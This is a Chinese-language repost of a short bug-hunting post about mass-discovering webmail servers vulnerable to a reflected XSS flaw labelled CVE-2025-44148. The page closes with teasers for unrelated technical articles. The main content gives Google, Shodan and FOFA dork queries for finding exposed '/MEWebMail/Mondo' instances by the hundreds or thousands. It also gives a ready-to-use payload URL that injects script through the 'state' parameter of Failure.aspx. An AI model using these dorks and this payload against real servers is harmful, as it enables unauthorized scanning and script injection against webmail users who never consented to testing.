news 2026/1/14 7:03:32

XSS大规模挖掘实战:利用谷歌、Shodan等平台发现CVE-2025-44148漏洞

作者头像

张小明

前端开发工程师

1.2k 24
文章封面图
XSS大规模挖掘实战:利用谷歌、Shodan等平台发现CVE-2025-44148漏洞

XSS大规模挖掘:CVE-2025-44148

Google + Shodan + FOFA + ZoomEye Dorking

作者:Abhirup Konwar
2025年8月24日

1️⃣ Google Dorking

inurl:/Mondo/lang/sys

然后,只需在下方端点后追加XSS载荷,将其设置为参数“state”的值。首先将“Login.aspx”替换为“Failure.aspx”。

/Mondo/lang/sys/Failure.aspx?state=%22;}alert(1);function%20test(){%22

(按回车或点击查看完整尺寸图片)

2️⃣ Shodan Dorking

(200+ 条结果)

http.html:"/MEWebMail/Mondo"

目标过滤

http.html:"/MEWebMail/Mondo" hostname:target.com

http.html:"/MEWebMail/Mondo" ssl.cert.subject.cn:target.com

2个重要的切面分析:

  • Domain
  • ssl.cert.subject.cn

(按回车或点击查看完整尺寸图片)

3️⃣ FOFA Dorking

(2000+ 条结果)

body="/MEWebMail/Mondo"

(按回车或点击查看完整尺寸图片)
CSD0tFqvECLokhw9aBeRqqjH1LDrKjpa6GLzq6aSalFOjy8LSkMQVhDym9Ro/PPKMi9i/0fzjc/f5q2BMEcWEfNONvpLsiL2V46Jeoq6iJI=
更多精彩内容 请关注我的个人公众号 公众号(办公AI智能小助手)
对网络安全、黑客技术感兴趣的朋友可以关注我的安全公众号(网络安全技术点滴分享)

版权声明: 本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若内容造成侵权/违法违规/事实不符,请联系邮箱:809451989@qq.com进行投诉反馈,一经查实,立即删除!
网站建设 2026/1/13 12:14:04

FPGA Memory使用中的十大关键陷阱

FPGA Memory使用中的十大关键陷阱 FPGA Memory(尤其是Block RAM、Distributed RAM和UltraRAM)的使用看似简单,但在实际工程中隐藏着许多不易察觉的“坑”,这些坑往往在系统集成、时序收敛或上板运行时才会暴露。以下是基于工程经验…

作者头像 李华
网站建设 2026/1/13 16:01:02

FastStone Capture注册码替代方案:录制lora-scripts操作视频

用开源方式录制 LoRA 微调操作视频:告别 FastStone Capture 注册码 在 AIGC(人工智能生成内容)快速普及的今天,越来越多设计师、开发者和内容创作者开始尝试微调自己的 AI 模型。无论是训练一个专属画风的 Stable Diffusion 模型&…

作者头像 李华
网站建设 2026/1/7 23:13:28

【Java毕设源码分享】基于springboot+vue的流动摊位管理系统的设计与实现(程序+文档+代码讲解+一条龙定制)

博主介绍:✌️码农一枚 ,专注于大学生项目实战开发、讲解和毕业🚢文撰写修改等。全栈领域优质创作者,博客之星、掘金/华为云/阿里云/InfoQ等平台优质作者、专注于Java、小程序技术领域和毕业项目实战 ✌️技术范围:&am…

作者头像 李华
网站建设 2026/1/12 22:40:24

【Java毕设源码分享】基于springboot+vue的小区停车管理系统的设计与实现(程序+文档+代码讲解+一条龙定制)

博主介绍:✌️码农一枚 ,专注于大学生项目实战开发、讲解和毕业🚢文撰写修改等。全栈领域优质创作者,博客之星、掘金/华为云/阿里云/InfoQ等平台优质作者、专注于Java、小程序技术领域和毕业项目实战 ✌️技术范围:&am…

作者头像 李华
网站建设 2026/1/11 19:25:16

内存泄漏终结者来了,Clang 17中你不可不知的3大调试神器

第一章:内存泄漏终结者来了,Clang 17中你不可不知的3大调试神器现代C/C开发中,内存泄漏一直是困扰开发者的核心难题。Clang 17带来了三项革命性的调试工具,显著提升了内存问题的诊断效率,让隐藏的资源泄露无处遁形。Ad…

作者头像 李华
网站建设 2026/1/6 19:01:58

提升LoRA生成效果:精准标注prompt的关键作用分析

提升LoRA生成效果:精准标注prompt的关键作用分析 在生成式AI快速普及的今天,我们早已不再满足于“画得像”或“写得通顺”。无论是独立艺术家想打造专属视觉风格,还是企业希望训练出符合品牌语调的语言助手,个性化微调已成为刚需。…

作者头像 李华